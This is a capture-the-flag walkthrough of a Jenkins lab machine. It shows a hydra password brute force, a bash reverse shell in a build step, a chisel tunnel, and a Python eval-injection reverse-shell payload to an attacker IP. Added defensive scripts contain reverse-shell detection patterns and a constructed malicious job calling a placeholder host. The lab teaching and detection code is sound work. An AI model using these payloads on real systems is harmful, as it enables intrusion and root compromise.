This is a vulnerable VM from PwnTillDawn.
Box: Medium, Flags to acquire = 4
Let's start with a quick Nmap scan.
We can see 2 ports open: SSH and an unknown port. Let's enumerate a bit more.
Port 30609 looks to be a web service, judging by the robots.txt entry, so let's check it out.
We get a hint here about build links, whatever that means. Let's visit the main web service. Here we are presented with a Jenkins login portal.
After trying numerous public exploits and the Metasploit modules for Jenkins, none of the payloads would work, so back to the drawing board (brute-force time!)
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.150.150.38 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"
After a little while, we get a result.
Now we can log in!
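From the defender's side, the hydra run above leaves a very distinctive trace: one POST to /j_acegi_security_check per guess, each answered with a redirect to /loginError. The script below is an added example (not part of the original walkthrough) that parses Combined Log Format access-log lines, as a reverse proxy in front of Jenkins would write them, and flags any source IP that exceeds a threshold of login POSTs inside a sliding window. The log format, the addresses, the timestamps and the thresholds are all constructed for the example.

```python
"""Spot a password-guessing run against the Jenkins login endpoint.

Added example, not part of the original write-up.  It parses Combined Log
Format lines from a proxy in front of Jenkins and flags any source IP that
exceeds THRESHOLD POSTs to /j_acegi_security_check inside a sliding WINDOW.
The log format, addresses and timestamps below are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/j_acegi_security_check"
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # ignore any query string
        "status": int(m["status"]),
    }


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Map each offending source IP to the timestamp at which it crossed the threshold."""
    recent = defaultdict(deque)   # ip -> timestamps of its login POSTs still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:   # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold and rec["ip"] not in flagged:
            flagged[rec["ip"]] = rec["ts"]
    return flagged


# ---- constructed sample log (not real traffic) ------------------------------
T0 = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)


def make_line(ip, ts, method, path, status):
    return (f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
            f'{status} 0 "-" "Mozilla/5.0"')


SAMPLE_LOG = (
    # 12 guesses in 24 seconds from one address; every failed POST is followed by /loginError
    [make_line("198.51.100.7", T0 + timedelta(seconds=2 * i), "POST", LOGIN_PATH, 302) for i in range(12)]
    + [make_line("198.51.100.7", T0 + timedelta(seconds=2 * i + 1), "GET", "/loginError", 200) for i in range(12)]
    # a legitimate user who mistyped once and then signed in
    + [make_line("203.0.113.5", T0 + timedelta(seconds=5), "POST", LOGIN_PATH, 302),
       make_line("203.0.113.5", T0 + timedelta(seconds=40), "POST", LOGIN_PATH, 302)]
)

if __name__ == "__main__":
    for ip, when in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} crossed the login-attempt threshold at {when.isoformat()}")
```

With the defaults only 198.51.100.7 is reported, at the 10th attempt; the two-attempt user stays under the threshold. The same per-source sliding-window count is what a fail2ban jail or a WAF rate rule on that path would do, and locking the account after N failures (a Jenkins option) closes the hole the wordlist walks through.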
Looking over the Jenkins application and visiting the asynchPeople page we get our first flag (http://10.150.150.38:30609/asynchPeople/)
Remembering our hint from earlier about build (robots.txt), it becomes apparent we need to use the build options to get onto the box.
Time to make a new task. Head over to http://10.150.150.38:30609/view/all/newJob (New Item).
Enter a project name, select Freestyle project as the type, then click OK.
On the next page enter a description in the description box (whatever you like here), then scroll down to Build (there's that hint again!).
Click Add build step and pick the Execute shell option, as we are on a Linux box.
Then add your payload. I used a simple bash reverse shell here.
Click Save, then Build Now to fire the payload (don’t forget to start a Netcat listener!)
Boom!! We get our shell
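Every Execute shell step a user adds through the UI is persisted on disk, so this technique is easy to audit for. The script below is an added example (not from the original walkthrough or from Jenkins itself): it reads the config.xml that Jenkins writes under $JENKINS_HOME/jobs/<name>/config.xml, pulls every <hudson.tasks.Shell><command> out of <builders>, and reports commands matching a small list of reverse-shell and download-and-run indicators. The two job definitions and the indicator list are constructed for the example.

```python
"""Audit Jenkins freestyle jobs for Execute shell steps that look like a dropped shell.

Added example, not from the original write-up or from Jenkins.  Freestyle jobs
live at $JENKINS_HOME/jobs/<name>/config.xml with each Execute shell step
stored as <builders><hudson.tasks.Shell><command>.  The indicator list and the
two sample jobs below are constructed for the example.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# (pattern, reason) pairs: shapes a build script rarely has a legitimate reason to contain
SUSPICIOUS = [
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp network redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash (reverse-shell stub)"),
    (re.compile(r"\b(nc|ncat)\b.*\s-e\s"), "netcat with -e (shell bound to a socket)"),
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"), "download piped straight into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\bpython[23]?\s+-c\b"), "inline python -c one-liner"),
]


def shell_steps(config_xml):
    """Return the script of every Execute shell build step in one job's config.xml."""
    root = ET.fromstring(config_xml)
    return [step.findtext("command", default="") for step in root.iter("hudson.tasks.Shell")]


def audit_job(job_name, config_xml):
    """Return one finding per (build step, indicator) hit; an empty list means nothing matched."""
    findings = []
    for idx, cmd in enumerate(shell_steps(config_xml), start=1):
        for pattern, reason in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append({"job": job_name, "step": idx, "reason": reason,
                                 "command": " ".join(cmd.split())[:80]})
    return findings


def audit_jenkins_home(jenkins_home):
    """Walk a real JENKINS_HOME and audit every freestyle job found under jobs/."""
    findings = []
    for cfg in sorted(Path(jenkins_home, "jobs").glob("*/config.xml")):
        findings.extend(audit_job(cfg.parent.name, cfg.read_text(encoding="utf-8")))
    return findings


# ---- constructed sample job definitions --------------------------------------
CLEAN_JOB = """<?xml version='1.0' encoding='UTF-8'?>
<project>
  <description>Nightly build</description>
  <builders>
    <hudson.tasks.Shell>
      <command>make clean &amp;&amp; make test</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

BAD_JOB = """<?xml version='1.0' encoding='UTF-8'?>
<project>
  <description>totally a normal job</description>
  <builders>
    <hudson.tasks.Shell>
      <command>curl http://192.0.2.10/setup.sh | sh</command>
    </hudson.tasks.Shell>
    <hudson.tasks.Shell>
      <command>bash -i &gt;&amp; /dev/tcp/192.0.2.10/4444 0&gt;&amp;1</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

if __name__ == "__main__":
    for f in audit_job("hotfix", BAD_JOB):
        print(f"[{f['job']}] step {f['step']}: {f['reason']}: {f['command']}")
```

Run audit_jenkins_home("/var/lib/jenkins") on the real controller (the same directory FLAG70 sat in) to sweep every job. Pattern matching is only a first pass; the durable control is not letting a brute-forced admin account reach the build configuration at all, which means per-user permissions, no shared admin, and the account lockout mentioned in the brute-force section.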
Let's make it stable so Ctrl+C won't kick us off the box; we can use python3 for this.
Shell Upgrade (STTY)
* python3 -c 'import pty;pty.spawn("/bin/bash")'
* Press Ctrl + z
* Enter: stty raw -echo;fg
* Enter: reset
* Enter: xterm
Tip: now set the terminal type so things like Ctrl+L work.
* Enter: export TERM=xterm
Now we can grab FLAG70 at /var/lib/jenkins
Enum Round 2
With the first two flags, it's time to start the enum phase again.
Checking out the system shows an open port on localhost:8080
Using wget we can pull the page and its source code. Let's do that.
Viewing index.html with cat shows a comment in the source pointing to another FLAG (this time in an image). We can download it with wget and send it to our machine to view it, or we can use chisel (a port-forward/tunnel tool) to reach the internal site from our machine for easy access.
Chisel (port forward)
We need to get chisel on the box we are attacking.
Chisel Download: https://github.com/jpillora/chisel
Basic user guide for tunneling: https://book.hacktricks.xyz/tunneling-and-port-forwarding
I used my own tool to transfer the files
I’ve added the binary in /usr/local/bin/simpserv. I have my most used tools and scripts saved in /opt/tools. This allows me to enter one command to transfer files across to the box.
cd /opt/tools && sudo simpserv
Now I can transfer with copy and paste for ease (you're welcome to use whatever method you feel comfortable with).
Upload chisel to the target box, then start the chisel server on our own machine for a reverse connection.
On our machine:
chisel server -p 8000 --reverse
On the target box (YOURIP is the address of our machine):
chisel client YOURIP:8000 R:8080:127.0.0.1:8080
If you have Burp Suite already listening on 8080, change the first port after R: to a free one.
eg: chisel client YOURIP:8000 R:8081:127.0.0.1:8080
Now you can open your browser and connect to the internal site via the reverse proxy.
Now with the proxy setup, we can finally access FLAG.png (flag71)
Privilege Escalation (Root)
Looking at the web page on localhost port 8080, we can see 2 boxes which take in 2 numbers and add them together.
Having no luck with basic web attacks, I started to enum the box again. I discovered a file owned by root running in the process list: /usr/bin/python /root/mycalc/untitled.py 127.0.0.1 8080
This gives us a hint to the exploit path (Python command injection). Not knowing this, a quick Google search led me to this article: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
Trying a few of the commands, I quickly gained a reverse shell.
Start another Netcat listener; I chose port 30609 as it's open already.
nc -lnvp 30609
Box 1 on the website:
__import__('os').system('bash -c "bash -i >& /dev/tcp/10.66.66.238/30609 0>&1"')#
Hit Calculate to get the reverse shell.
Now we can get the final flag as Root! (FLAG72)
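A form that takes two numbers, adds them, and can be hijacked with __import__(...) in one of the fields is the classic sign of user input reaching eval(). The block below is an added example, not the challenge's untitled.py (which the walkthrough never shows): vulnerable_add() reproduces the unsafe pattern, safe_add() is the fix for a two-number form (parse the fields as numbers, never evaluate text), and safe_expression() goes a step further for the case where a whole arithmetic expression has to be accepted, walking the AST and refusing anything that is not a number or a basic operator. All function names are hypothetical.

```python
"""The eval() pattern behind the localhost:8080 calculator, next to safe replacements.

Added example, not the challenge's own untitled.py.  vulnerable_add() shows the
unsafe pattern; safe_add() and safe_expression() show how to take numeric input
without ever turning it into code.  Function names are hypothetical.
"""
import ast
import operator


def vulnerable_add(a, b):
    """Unsafe: the two form fields are spliced into source text and executed.
    Whatever the user writes in a field runs with the calculator's privileges."""
    return eval(f"{a} + {b}")


def safe_add(a, b):
    """Fixed for a two-number form: treat the fields as data, not code."""
    try:
        return float(a) + float(b)
    except (TypeError, ValueError):
        raise ValueError("both fields must be numeric") from None


# Only these node types may appear in an accepted expression.
BINARY_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
              ast.Mult: operator.mul, ast.Div: operator.truediv}
UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def safe_expression(text, max_len=64):
    """Evaluate an arithmetic expression without eval(): parse it, then accept
    only numeric constants, + - * / and unary sign.  Names, attribute access,
    calls, subscripts, ** and anything else raise ValueError."""
    if len(text) > max_len:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(text, mode="eval")
    except SyntaxError:
        raise ValueError("not a valid expression") from None

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if (isinstance(node, ast.Constant) and isinstance(node.value, (int, float))
                and not isinstance(node.value, bool)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in BINARY_OPS:
            try:
                return BINARY_OPS[type(node.op)](walk(node.left), walk(node.right))
            except ZeroDivisionError:
                raise ValueError("division by zero") from None
        if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
            return UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree)


def is_rejected(fn, *args):
    """True if fn(*args) refuses the input with ValueError (shows the checks work)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(safe_add("2", "3"))                                            # 5.0
    print(safe_expression("2 + 3 * 4"))                                  # 14
    print(is_rejected(safe_expression, "__import__('os').system('id')"))  # True
```

The AST walk checks the operator before evaluating either side, so a disallowed operator such as ** is refused without computing anything, and the length cap keeps a pathological expression from tying up the process. Running the service as root made the finding a full compromise; the same bug under an unprivileged service account would still be serious, but it would not have handed over FLAG72.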
Thanks!! I hope you enjoyed the walkthrough.
Keep hacking the world! (Ethically!!)